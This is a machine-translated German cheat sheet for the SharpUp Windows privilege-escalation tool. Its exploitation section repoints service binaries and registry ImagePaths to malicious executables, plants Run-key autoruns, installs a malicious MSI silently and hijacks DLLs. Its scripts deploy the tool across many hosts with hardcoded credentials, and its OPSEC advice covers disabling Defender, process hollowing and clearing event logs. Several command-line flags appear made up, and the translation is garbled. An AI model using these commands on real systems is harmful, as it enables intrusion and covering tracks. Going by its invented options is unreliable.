SharpUp Cheat Blatt¶
Im Überblick
SharpUp ist ein C#-Port des beliebten PowerUp Privileg Escalation Enumeration Skript, entworfen, um gemeinsame Windows Privileg Escalation Vektoren durch umfassende Systemanalyse zu identifizieren. Entwickelt im Rahmen des GhostPack Toolkits von harmj0y und anderen Sicherheitsforschern bietet SharpUp Penetrationsprüfer und rote Teambetreiber mit einem leistungsstarken Werkzeug zur Entdeckung von Fehlkonfigurationen und Schwachstellen, die zu lokalen Privilegien Escalation auf Windows-Systemen führen könnten. Das Tool stellt eine moderne Herangehensweise an Privileg Escalation Enumeration, die die . NET-Rahmen für verbesserte Stealth und Kompatibilität.
Der Hauptvorteil von SharpUp über seinen PowerShell Vorgänger liegt in seiner kompilierten Natur, die es weniger anfällig für PowerShell-basierte Erkennungsmechanismen und Skriptausführungsrichtlinien macht. Als eigenständige Ausführung kann SharpUp problemlos in Umgebungen eingesetzt und ausgeführt werden, in denen die PowerShell-Ausführung eingeschränkt oder stark überwacht wird. Das Tool führt umfangreiche Überprüfungen in mehreren Kategorien durch, einschließlich Service-Misskonfigurationen, Registrierungslücken, Dateisystemberechtigungen und verschiedene Windows-spezifische Privileg Escalation Techniken.
SharpUp arbeitet durch systematische Prüfung des Zielsystems für allgemeine Privileg Eskalationsvektoren, einschließlich nicht zitierte Service-Pfade, schwache Service-Berechtigungen, Registry Autoruns, DLL-Hijacking-Möglichkeiten, und verschiedene andere Fehlkonfigurationen, die genutzt werden könnten, um erhöhte Privilegien zu gewinnen. Das Tool bietet detaillierte Ausgabe, die Sicherheitsexperten hilft verstehen nicht nur, welche Schwachstellen existieren, sondern auch, wie sie ausgenutzt werden könnten, so dass es ein unschätzbares Vermögen für Offensive und Verteidigungssicherheitsoperationen.
• Installation
Binary Download¶
Vorkompilierte Downloads Sharp Auf Lager:
# Download from GitHub releases
wget https://github.com/GhostPack/SharpUp/releases/latest/download/SharpUp.exe
# Download specific version
wget https://github.com/GhostPack/SharpUp/releases/download/v1.1.0/SharpUp.exe
# Verify file integrity
sha256sum SharpUp.exe
# Make executable (if needed)
chmod +x SharpUp.exe
Source Compilation¶
Sharp kompilieren Von der Quelle:
# Clone repository
git clone https://github.com/GhostPack/SharpUp.git
cd SharpUp
# Compile with Visual Studio
msbuild SharpUp.sln /p:Configuration=Release
# Compile with .NET CLI
dotnet build -c Release
# Cross-compile for different architectures
dotnet publish -c Release -r win-x64 --self-contained
dotnet publish -c Release -r win-x86 --self-contained
Docker Build Environment¶
# Create Docker build environment
cat > Dockerfile << 'EOF'
FROM mcr.microsoft.com/dotnet/sdk:6.0
WORKDIR /app
COPY . .
RUN dotnet build -c Release
EOF
# Build container
docker build -t sharpup-builder .
# Extract compiled binary
docker run --rm -v $(pwd):/output sharpup-builder cp /app/bin/Release/net6.0/SharpUp.exe /output/
oder Basisnutzung
Standard Enumeration¶
Einfache SharpUp-Enumeration:
# Run all checks
SharpUp.exe
# Run with verbose output
SharpUp.exe -v
# Run specific check categories
SharpUp.exe -c Services
# Run multiple categories
SharpUp.exe -c Services,Registry
# Save output to file
SharpUp.exe > privilege_escalation_report.txt
Gezielte Überprüfungen¶
Durchführung spezifischer Privileg Eskalation Kontrollen:
# Check service permissions
SharpUp.exe -c Services
# Check registry autoruns
SharpUp.exe -c Registry
# Check file permissions
SharpUp.exe -c Files
# Check scheduled tasks
SharpUp.exe -c Tasks
# Check installed software
SharpUp.exe -c Software
Ausgabeformatierung¶
Controlling Sharp Ausgabeformat:
# JSON output format
SharpUp.exe -f json
# XML output format
SharpUp.exe -f xml
# CSV output format
SharpUp.exe -f csv
# Detailed text output
SharpUp.exe -f detailed
# Quiet mode (minimal output)
SharpUp.exe -q
Erweiterte Eigenschaften
Service Enumeration¶
Umfassende Service Privileg Escalation prüft:
# Check unquoted service paths
SharpUp.exe -c Services -t UnquotedPaths
# Check weak service permissions
SharpUp.exe -c Services -t WeakPermissions
# Check service binary permissions
SharpUp.exe -c Services -t BinaryPermissions
# Check service registry permissions
SharpUp.exe -c Services -t RegistryPermissions
# Check all service vulnerabilities
SharpUp.exe -c Services -t All
Registry Analysis¶
Registrierungsbasierte Privileg Escalation Enumeration:
# Check autorun entries
SharpUp.exe -c Registry -t Autoruns
# Check registry permissions
SharpUp.exe -c Registry -t Permissions
# Check AlwaysInstallElevated
SharpUp.exe -c Registry -t AlwaysInstallElevated
# Check registry hijacking opportunities
SharpUp.exe -c Registry -t Hijacking
# Check all registry vulnerabilities
SharpUp.exe -c Registry -t All
Dateisystem überprüft¶
Dateisystem Privileg Escalation Enumeration:
# Check writable directories in PATH
SharpUp.exe -c Files -t WritablePath
# Check DLL hijacking opportunities
SharpUp.exe -c Files -t DLLHijacking
# Check file permissions
SharpUp.exe -c Files -t Permissions
# Check backup files
SharpUp.exe -c Files -t Backups
# Check configuration files
SharpUp.exe -c Files -t ConfigFiles
Scheduled Aufgabenanalyse¶
Scheduled Task Privileg Escalation Kontrollen:
# Check scheduled task permissions
SharpUp.exe -c Tasks -t Permissions
# Check task binary permissions
SharpUp.exe -c Tasks -t BinaryPermissions
# Check task arguments
SharpUp.exe -c Tasks -t Arguments
# Check task triggers
SharpUp.exe -c Tasks -t Triggers
# Check all task vulnerabilities
SharpUp.exe -c Tasks -t All
Ausbeutungstechniken
Service Exploitation¶
Nutzung servicebasierter Schwachstellen:
# Exploit unquoted service path
sc stop "Vulnerable Service"
copy malicious.exe "C:\Program Files\Vulnerable Path\Program.exe"
sc start "Vulnerable Service"
# Exploit weak service permissions
sc config "Vulnerable Service" binpath= "C:\temp\malicious.exe"
sc start "Vulnerable Service"
# Exploit service binary permissions
copy malicious.exe "C:\Program Files\Service\service.exe"
sc start "Vulnerable Service"
Registry Exploitation¶
Nutzung von Registrierungs-basierten Schwachstellen:
# Exploit AlwaysInstallElevated
msiexec /quiet /qn /i malicious.msi
# Exploit autorun registry entry
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Malicious" /t REG_SZ /d "C:\temp\malicious.exe"
# Exploit registry permissions
reg add "HKLM\SYSTEM\CurrentControlSet\Services\VulnService" /v "ImagePath" /t REG_EXPAND_SZ /d "C:\temp\malicious.exe"
DLL Hijacking¶
Exploiting DLL-Hijacking Möglichkeiten:
# Create malicious DLL
# Compile DLL with appropriate exports
gcc -shared -o malicious.dll malicious.c
# Place DLL in hijackable location
copy malicious.dll "C:\Program Files\Application\vulnerable.dll"
# Trigger application execution
"C:\Program Files\Application\app.exe"
Automatisierungsskripte
Automatisierte Zählung¶
#!/bin/bash
# SharpUp automated enumeration script
TARGET_HOST="192.168.1.100"
USERNAME="user"
PASSWORD="password"
echo "Starting SharpUp enumeration on $TARGET_HOST"
# Copy SharpUp to target
smbclient //$TARGET_HOST/C$ -U $USERNAME%$PASSWORD -c "put SharpUp.exe temp\SharpUp.exe"
# Execute SharpUp remotely
winexe -U $USERNAME%$PASSWORD //$TARGET_HOST "C:\temp\SharpUp.exe -f json > C:\temp\sharpup_results.json"
# Retrieve results
smbclient //$TARGET_HOST/C$ -U $USERNAME%$PASSWORD -c "get temp\sharpup_results.json sharpup_results_$TARGET_HOST.json"
# Clean up
smbclient //$TARGET_HOST/C$ -U $USERNAME%$PASSWORD -c "del temp\SharpUp.exe; del temp\sharpup_results.json"
echo "Enumeration completed for $TARGET_HOST"
Ergebnisanalyse¶
#!/usr/bin/env python3
# SharpUp result analysis script
import json
import sys
def analyze_sharpup_results(json_file):
"""Analyze SharpUp JSON results"""
with open(json_file, 'r') as f:
results = json.load(f)
vulnerabilities = []
# Analyze service vulnerabilities
if 'Services' in results:
for service in results['Services']:
if service.get('Vulnerable', False):
vulnerabilities.append(\\\\{
'type': 'Service',
'name': service['Name'],
'issue': service['Issue'],
'severity': service.get('Severity', 'Medium')
\\\\})
# Analyze registry vulnerabilities
if 'Registry' in results:
for reg_entry in results['Registry']:
if reg_entry.get('Vulnerable', False):
vulnerabilities.append(\\\\{
'type': 'Registry',
'path': reg_entry['Path'],
'issue': reg_entry['Issue'],
'severity': reg_entry.get('Severity', 'Medium')
\\\\})
# Sort by severity
severity_order = \\\\{'Critical': 0, 'High': 1, 'Medium': 2, 'Low': 3\\\\}
vulnerabilities.sort(key=lambda x: severity_order.get(x['severity'], 4))
# Generate report
print("SharpUp Vulnerability Analysis Report")
print("=" * 50)
for vuln in vulnerabilities:
print(f"Type: \\\\{vuln['type']\\\\}")
print(f"Severity: \\\\{vuln['severity']\\\\}")
print(f"Issue: \\\\{vuln['issue']\\\\}")
if 'name' in vuln:
print(f"Service: \\\\{vuln['name']\\\\}")
if 'path' in vuln:
print(f"Path: \\\\{vuln['path']\\\\}")
print("-" * 30)
if __name__ == "__main__":
if len(sys.argv) != 2:
print("Usage: python3 analyze_results.py <sharpup_results.json>")
sys.exit(1)
analyze_sharpup_results(sys.argv[1])
Massenzählung¶
#!/usr/bin/env python3
# SharpUp mass enumeration script
import subprocess
import threading
import json
import time
class SharpUpScanner:
def __init__(self, targets_file, username, password):
self.targets = self.load_targets(targets_file)
self.username = username
self.password = password
self.results = \\\\{\\\\}
def load_targets(self, targets_file):
"""Load target hosts from file"""
with open(targets_file, 'r') as f:
return [line.strip() for line in f if line.strip()]
def scan_target(self, target):
"""Scan individual target with SharpUp"""
try:
print(f"Scanning \\\\{target\\\\}...")
# Copy SharpUp to target
copy_cmd = f"smbclient //\\\\{target\\\\}/C$ -U \\\\{self.username\\\\}%\\\\{self.password\\\\} -c 'put SharpUp.exe temp\\SharpUp.exe'"
subprocess.run(copy_cmd, shell=True, capture_output=True)
# Execute SharpUp
exec_cmd = f"winexe -U \\\\{self.username\\\\}%\\\\{self.password\\\\} //\\\\{target\\\\} 'C:\\temp\\SharpUp.exe -f json'"
result = subprocess.run(exec_cmd, shell=True, capture_output=True, text=True)
if result.returncode == 0:
self.results[target] = json.loads(result.stdout)
print(f"Successfully scanned \\\\{target\\\\}")
else:
print(f"Failed to scan \\\\{target\\\\}: \\\\{result.stderr\\\\}")
# Cleanup
cleanup_cmd = f"smbclient //\\\\{target\\\\}/C$ -U \\\\{self.username\\\\}%\\\\{self.password\\\\} -c 'del temp\\SharpUp.exe'"
subprocess.run(cleanup_cmd, shell=True, capture_output=True)
except Exception as e:
print(f"Error scanning \\\\{target\\\\}: \\\\{e\\\\}")
def run_scan(self, max_threads=10):
"""Run scan against all targets"""
threads = []
for target in self.targets:
if len(threads) >= max_threads:
# Wait for threads to complete
for t in threads:
t.join()
threads = []
thread = threading.Thread(target=self.scan_target, args=(target,))
thread.start()
threads.append(thread)
time.sleep(1) # Avoid overwhelming targets
# Wait for remaining threads
for t in threads:
t.join()
return self.results
# Usage
if __name__ == "__main__":
scanner = SharpUpScanner("targets.txt", "admin", "password123")
results = scanner.run_scan()
# Save results
with open("mass_sharpup_results.json", "w") as f:
json.dump(results, f, indent=2)
print(f"Scan completed. Results saved for \\\\{len(results)\\\\} targets.")
Integrationsbeispiele
Metasploit Integration¶
# Metasploit post-exploitation module for SharpUp
require 'msf/core'
require 'rex'
class MetasploitModule < Msf::Post
include Msf::Post::Windows::Priv
include Msf::Post::File
def initialize(info = \\\\{\\\\})
super(update_info(info,
'Name' => 'Windows SharpUp Privilege Escalation Enumeration',
'Description' => 'Runs SharpUp to enumerate privilege escalation vectors',
'License' => MSF_LICENSE,
'Author' => ['Your Name'],
'Platform' => ['win'],
'SessionTypes' => ['meterpreter']
))
end
def run
print_status("Running SharpUp enumeration...")
# Upload SharpUp
sharpup_path = "#\\\\{session.fs.file.expand_path("%TEMP%")\\\\}\\SharpUp.exe"
upload_file(sharpup_path, File.join(Msf::Config.data_directory, "exploits", "SharpUp.exe"))
# Execute SharpUp
output = cmd_exec("#\\\\{sharpup_path\\\\} -f json")
# Parse and display results
begin
results = JSON.parse(output)
print_good("SharpUp enumeration completed")
# Process results
if results['Services']
print_status("Service vulnerabilities found:")
results['Services'].each do|service|
if service['Vulnerable']
print_good(" #\\\\{service['Name']\\\\}: #\\\\{service['Issue']\\\\}")
end
end
end
rescue JSON::ParserError
print_error("Failed to parse SharpUp output")
end
# Cleanup
file_rm(sharpup_path)
end
end
Power Integration von Shell¶
# PowerShell wrapper for SharpUp
function Invoke-SharpUpEnum \\\\{
param(
[string]$SharpUpPath = ".\SharpUp.exe",
[string]$OutputFormat = "json",
[string]$Categories = "All",
[switch]$Verbose
)
Write-Host "[+] Starting SharpUp enumeration" -ForegroundColor Green
# Build command arguments
$arguments = @()
if ($Categories -ne "All") \\\\{
$arguments += "-c", $Categories
\\\\}
if ($OutputFormat) \\\\{
$arguments += "-f", $OutputFormat
\\\\}
if ($Verbose) \\\\{
$arguments += "-v"
\\\\}
try \\\\{
# Execute SharpUp
$result = & $SharpUpPath @arguments 2>&1
if ($LASTEXITCODE -eq 0) \\\\{
Write-Host "[+] SharpUp completed successfully" -ForegroundColor Green
if ($OutputFormat -eq "json") \\\\{
$jsonResult = $result|ConvertFrom-Json
return $jsonResult
\\\\} else \\\\{
return $result
\\\\}
\\\\} else \\\\{
Write-Host "[-] SharpUp failed with exit code: $LASTEXITCODE" -ForegroundColor Red
Write-Host $result -ForegroundColor Red
\\\\}
\\\\}
catch \\\\{
Write-Host "[-] Error executing SharpUp: $($_.Exception.Message)" -ForegroundColor Red
\\\\}
\\\\}
# Usage examples
$results = Invoke-SharpUpEnum -Verbose
$serviceVulns = Invoke-SharpUpEnum -Categories "Services" -OutputFormat "json"
Fehlerbehebung
Häufige Fragen¶
** Einschränkungen der Ausführungspolitik:**
# Check execution policy
powershell Get-ExecutionPolicy
# Bypass execution policy
powershell -ExecutionPolicy Bypass -File script.ps1
# Use alternative execution methods
rundll32.exe shell32.dll,ShellExec_RunDLL SharpUp.exe
```_
**Permissionsfragen:**
```bash
# Check current privileges
whoami /priv
# Run as different user
runas /user:domain\user SharpUp.exe
# Use PsExec for remote execution
psexec \\target -u user -p password SharpUp.exe
```_
** Antivirus Erkennung:**
```bash
# Check Windows Defender status
powershell Get-MpComputerStatus
# Disable real-time protection (if authorized)
powershell Set-MpPreference -DisableRealtimeMonitoring $true
# Use obfuscation techniques
# Recompile with different signatures
# Use process hollowing or injection
```_
### Debugging
Debugging aktivieren:
```bash
# Run with verbose output
SharpUp.exe -v
# Capture detailed logs
SharpUp.exe -v > debug.log 2>&1
# Use Process Monitor to track file/registry access
procmon.exe
# Use Sysmon for detailed logging
sysmon -i sysmonconfig.xml
Sicherheitsbedenken
Operationelle Sicherheit¶
** Nachweisvermeidung:** - Verwenden Sie legitim aussehende Dateinamen - Execute während der Geschäftszeiten - Verdächtige Prozessnamen vermeiden - Artefakte nach der Ausführung reinigen - Monitor für defensive Antworten
**Artifact Management: ** - Sicheres Löschen von Binaries - Eventprotokolle löschen, wenn möglich - temporäre Dateien entfernen - Befehlsgeschichte löschen - Monitor für forensische Analyse
Rechtliche und ethische Überlegungen¶
Authorized Testing Only: - ordnungsgemäße schriftliche Genehmigung erhalten - Definieren Sie klare Grenzen - Dokumentation aller Aktivitäten - Verantwortungsvolle Offenlegung - Überprüfung der Systemintegrität
Beste Praktiken: - Einsatz in kontrollierten Umgebungen - Regelmäßige Sicherheitsbewertungen - Durchführung von Sanierungsmaßnahmen - Monitor für unbefugte Nutzung - Audit-Strecken beibehalten
Referenzen
ANHANG SharpUp GitHub Repository 2. PowerUp Original Tool 3. Windows Privilege Escalation Guide_ 4. MITRE ATT&CK - Privilege Escalation_ 5. Windows Security Hardening